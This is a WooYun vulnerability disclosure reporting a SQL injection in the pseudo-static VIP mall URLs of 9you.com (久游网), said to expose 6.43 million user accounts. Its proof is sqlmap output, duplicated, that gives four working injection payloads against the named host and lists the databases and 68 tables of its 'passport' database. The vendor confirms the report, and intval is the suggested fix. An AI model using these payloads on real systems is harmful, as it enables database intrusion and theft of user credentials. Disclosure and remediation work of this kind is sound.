当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162489

漏洞标题:久游网伪静态SQL注入涉及643万用户账户密码信息

相关厂商:久游网

漏洞作者: 小川

提交时间:2015-12-18 17:32

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-18: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

一提到九游,我的心里就哼着:苍茫的天涯是我的爱......

详细说明:

ragecomic.png

漏洞证明:

web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND 7940=7940 AND (6013=6013.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76);(SELECT * FROM (SELECT(SLEEP(5)))WpLQ)#.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND (SELECT * FROM (SELECT(SLEEP(5)))Lgns) AND (2756=2756.html
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786a71,0x506b5059486c4e537979,0x7176627171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- .html
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
Database: passport
[68 tables]
+-------------------------+
| au_cdk |
| au_cdk_type |
| au_itemsend |
| disk_usage_master |
| disk_usage_slave |
| email_sign |
| fast_reglog |
| get_username_paycard |
| get_username_registinfo |
| gmtools_account_sign |
| log_adult |
| log_appeal |
| log_appeal_rest |
| log_aupwd |
| log_aupwd_rest |
| log_email |
| log_email_yahoo |
| log_getpasswd |
| log_idcard |
| log_idcard_email |
| log_info_speed |
| log_login |
| log_matrixcard_lost |
| log_matrixcard_replace |
| log_matrixcard_set |
| log_matrixcard_unbind |
| log_nickname_speed |
| log_password_email |
| log_password_modify |
| log_password_vipcode |
| log_profile |
| log_propertylockreset |
| log_provip |
| log_provip_rest |
| log_qa |
| log_regist_reset |
| log_securecode |
| log_sim |
| log_token |
| log_username_mobile |
| lx_code_resend_log |
| lx_code_send_cpl |
| lx_code_send_log |
| lx_fullcode_limit |
| lx_ticket |
| m818_user_bind |
| m818_user_bind_log |
| matrixcard_info |
| mobile_checkcode |
| mobile_checkcode_vip |
| mobile_sendmsg |
| mobile_user_bind |
| mobile_user_bind_email |
| mobile_user_bind_log |
| mobile_user_bind_regist |
| ms_mobile_user |
| sim_bind |
| sim_lost |
| slave_check |
| sleep_user_au_log |
| sleep_user_pwd |
| token_info |
| token_unbind |
| user_bind_ydcy |
| user_bind_ydcy_err |
| user_login_info |
| voidnickname |
| ydcy_addstorage_log |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND 7940=7940 AND (6013=6013.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76);(SELECT * FROM (SELECT(SLEEP(5)))WpLQ)#.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND (SELECT * FROM (SELECT(SLEEP(5)))Lgns) AND (2756=2756.html
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786a71,0x506b5059486c4e537979,0x7176627171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- .html
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
Database: passport
[68 tables]
+-------------------------+
| au_cdk |
| au_cdk_type |
| au_itemsend |
| disk_usage_master |
| disk_usage_slave |
| email_sign |
| fast_reglog |
| get_username_paycard |
| get_username_registinfo |
| gmtools_account_sign |
| log_adult |
| log_appeal |
| log_appeal_rest |
| log_aupwd |
| log_aupwd_rest |
| log_email |
| log_email_yahoo |
| log_getpasswd |
| log_idcard |
| log_idcard_email |
| log_info_speed |
| log_login |
| log_matrixcard_lost |
| log_matrixcard_replace |
| log_matrixcard_set |
| log_matrixcard_unbind |
| log_nickname_speed |
| log_password_email |
| log_password_modify |
| log_password_vipcode |
| log_profile |
| log_propertylockreset |
| log_provip |
| log_provip_rest |
| log_qa |
| log_regist_reset |
| log_securecode |
| log_sim |
| log_token |
| log_username_mobile |
| lx_code_resend_log |
| lx_code_send_cpl |
| lx_code_send_log |
| lx_fullcode_limit |
| lx_ticket |
| m818_user_bind |
| m818_user_bind_log |
| matrixcard_info |
| mobile_checkcode |
| mobile_checkcode_vip |
| mobile_sendmsg |
| mobile_user_bind |
| mobile_user_bind_email |
| mobile_user_bind_log |
| mobile_user_bind_regist |
| ms_mobile_user |
| sim_bind |
| sim_lost |
| slave_check |
| sleep_user_au_log |
| sleep_user_pwd |
| token_info |
| token_unbind |
| user_bind_ydcy |
| user_bind_ydcy_err |
| user_login_info |
| voidnickname |
| ydcy_addstorage_log |
+-------------------------+

修复方案:

天地良心,绝未脱裤,至于vip库里的信息,我都没看,intval处理下吧

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-18 22:53

厂商回复:

扫描器还是手工啊?感觉屌屌的,这都被你找到了,
必须20分啊

最新状态:

暂无